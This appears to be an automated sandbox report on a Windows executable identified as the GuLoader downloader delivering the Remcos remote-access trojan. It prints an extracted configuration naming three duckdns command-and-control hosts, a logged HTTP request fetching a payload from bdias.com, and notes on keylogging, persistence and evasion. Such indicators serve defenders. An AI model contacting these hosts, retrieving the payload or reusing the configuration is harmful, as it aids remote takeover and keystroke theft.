
Windows Analysis Report
IMG635673567357735773573757875883587935775753Bjlkeloftet.exe

Overview

General Information

Sample name: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
Analysis ID: 1554912
MD5: a03dcb82d6ecaab34cc6ae971a806c06
SHA1: 3bf367387ad278b154bd2af42e7bedf0f8676f6c
SHA256: 4fc786009ad36ded81dfbd863802b06436b718112c35a505d447f6e0d31cbf8d
Tags: exe, GuLoader, user-sdf

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["odumegwu.duckdns.org:51525:1", "odumeje1.duckdns.org:51525:0", "odumeje.duckdns.org:51525:1"], "Assigned name": "LoneWolf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3DX9QW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\ProgramData\remcos\logs.dat; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000000.00000002.2056638671.000000000433E000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security

System Summary

Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, ProcessId: 1076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, ProcessId: 1076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key

Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, ProcessId: 1076, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T08:18:17.236404+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-13T08:18:56.325500+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49738 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T08:18:54.017024+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 91.196.125.125 | 80 | TCP

              AV Detection

Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe; Avira: detection malicious, Label: HEUR/AGEN.1337950
Source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["odumegwu.duckdns.org:51525:1", "odumeje1.duckdns.org:51525:0", "odumeje.duckdns.org:51525:1"], "Assigned name": "LoneWolf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3DX9QW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe; ReversingLabs: Detection: 28%
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; ReversingLabs: Detection: 28%
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Virustotal: Detection: 16%
Source: Yara match; File source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 91.196.125.125:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Code function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Code function: 0_2_004027CF FindFirstFileA,0_2_004027CF
Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Code function: 4_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405A4F
Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Code function: 4_2_00406620 FindFirstFileA,FindClose,4_2_00406620
Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe; Code function: 4_2_004027CF FindFirstFileA,4_2_004027CF

              Networking

Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49760 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49755 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49765 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49782 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49776 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49784 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49799 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49810 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49822 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49830 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49842 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49805 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49853 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49847 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49825 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49865 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49870 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49887 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49893 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49910 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49916 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49922 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49938 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49944 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49899 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49933 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49961 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49956 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49966 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49985 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49978 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50001 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50006 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49991 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50028 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50011 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50033 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50051 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50046 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50055 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50047 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50045 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50050 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50048 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50049 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50043 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50053 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50052 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50054 -> 192.169.69.26:51525
Source: Network traffic; Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50044 -> 192.169.69.26:51525
Source: Malware configuration extractor; URLs: odumegwu.duckdns.org
Source: Malware configuration extractor; URLs: odumeje1.duckdns.org
Source: Malware configuration extractor; URLs: odumeje.duckdns.org
Source: unknown; DNS query: name: odumeje.duckdns.org
Source: unknown; DNS query: name: odumegwu.duckdns.org
Source: unknown; DNS query: name: odumeje1.duckdns.org
Source: Joe Sandbox View; IP Address: 192.169.69.26
Source: Joe Sandbox View; ASN Name: WOWUS
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 91.196.125.125:80
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49738
Source: global traffic; HTTP traffic detected: GET /zjMSeQNkb41.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: bdias.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /zjMSeQNkb41.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: bdias.com | Cache-Control: no-cache
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: bdias.com
Source: global traffic; DNS traffic detected: DNS query: odumegwu.duckdns.org
Source: global traffic; DNS traffic detected: DNS query: odumeje1.duckdns.org
Source: global traffic; DNS traffic detected: DNS query: odumeje.duckdns.org
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890757573.0000000006B60000.00000004.00001000.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://bdias.com/zjMSeQNkb41.bin
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://bdias.com/zjMSeQNkb41.bine
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://bdias.com/zjMSeQNkb41.binj
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://bdias.com/zjMSeQNkb41.binm
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.dr; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.dr; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://bdias.com/
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://bdias.com/zjMSeQNkb41.bin
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://bdias.com/zjMSeQNkb41.bin/
Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://bdias.com/zjMSeQNkb41.bin2
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown; HTTPS traffic detected: 91.196.125.125:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match | File source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_004072D1
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_00406AFA
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_6E331B28
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 4_2_004072D1
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 4_2_00406AFA
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll 014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: String function: 00402C5E appears 52 times
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebromhidrosis fasteres.exe4 vs IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000000.2053154636.0000000000443000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebromhidrosis fasteres.exe4 vs IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Binary or memory string: OriginalFilenamebromhidrosis fasteres.exe4 vs IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/14@8/2
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
